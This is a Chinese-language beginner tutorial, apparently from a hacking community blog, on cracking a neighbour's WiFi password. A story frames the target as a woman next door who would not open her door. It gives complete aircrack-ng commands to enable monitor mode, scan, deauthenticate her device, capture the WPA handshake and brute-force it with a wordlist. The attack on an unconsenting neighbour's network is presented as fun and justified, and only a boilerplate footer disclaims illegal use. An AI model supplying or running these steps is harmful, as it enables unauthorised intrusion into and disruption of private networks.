新手小白破解邻家女神的WiFi密码,详细教学。

新手小白破解邻家女神的WiFi密码,详细教学。

一、前期准备

  1. 独立网卡的笔记本电脑或9.9拼多多外接网卡
  2. Kali
  3. 一杯快乐水

二、开始

      故事情节:很早很早以前,我还是一个单身且内向的男生的时候,搬到一个新的出租屋,因手机流量即将耗尽,且晚上也无法早早睡觉,没有网络的夜是最难熬的,只能去邻居家通过社工获取一下WiFi密码,但因为不爱说话,敲门声音有点大,邻居居然门都没给开,哎!只能回屋想想别的办法了。

       打开我的没网电脑,对着屏幕傻傻的发呆,难道今晚只能静静的睡觉吗?曾几何时,我也由一个黑客梦,敲敲键盘便能大展神威,为了实现梦想,曾经也苦心钻研,为了拿到WiFi密码,只能拿出我的皱皱巴巴的笔记本(本子),打开关于WiFi破解的那页纸片儿。

第一步、打开Kali系统

图片[1]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

插入PDD花9.9买的网卡再次输入:iwconfig

图片[2]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第二步、输入命令:airmon-ng start wlan0  打开网卡监听模式

如果显示wlan0mon就成功了,显示内容没有变化,有可能是其它网卡的进程,我们只需要输入命令:airmon-ng check kill 将该进程杀死即可,重新开启监听。

图片[3]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第三步、输入命令:airodump-ng wlan0mon 扫描附近的WiFi

根据情况扫描,点击ctrl+c停止,查看扫描获得的WiFi信息,找出一下女神家的WiFi(通过手机查看WiFi信号强度最高的那个)

图片[4]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第四步、查看WiFi相关信息

看来看去终于找到WiFi名字叫Wi-Fi-0987,信道(CH)为6,BSSID为6A:9A:C2:F2:6C:A2

图片[5]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第五步、输入命令:aireplay-ng -0 10 -a (BSSID) -c (STATION) wlan0mon 将女神家的WiFi断网,获取WiFi握手包

aireplay-ng -0 10 -a 6A:9A:C2:F2:6C:A2 -c 1A:F2:FD:97:34:2B wlan0mon

只有WiFi握手包中才有登录密码,所以如果对方手机不断开WiFi链接的话我们是无法抓取握手包的。

图片[6]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第六步、输入命令:airodump-ng -c (CH) –bssid (BSSID) -w (存放的路径) wlan0mon

airodump-ng -c 6 –bssid 6A:9A:C2:F2:6C:A2 -w /home/kali/zhutou/zhu wlan0mon
图片[7]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

如果抓到包了就会出现WPS handshake:

第七步、输入命令:aircrack-ng -w (字典路径) -b (BSSID) (抓到包的名称),对握手包进行暴力破解

aircrack-ng -w /home/kali/zhutou/1.txt -b 6A:9A:C2:F2:6C:A2 zhu-01.cap
图片[8]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

第八步、破解成功,连接女神家的WiFi。

图片[9]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

图片[10]-白帽子黑客在线学习与交流社区新手小白破解邻家女神的WiFi密码,详细教学。

本站永久网址:https://www.4×45.com ,

本文内容仅为技术科普,请勿用于非法用途 ,本文内容未隐讳任何个人、群体、公司。非文学作品,请勿用于阅读理解的练习 , 根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途 , 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责

—版权声明

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像不啃瓜皮只吃嚷1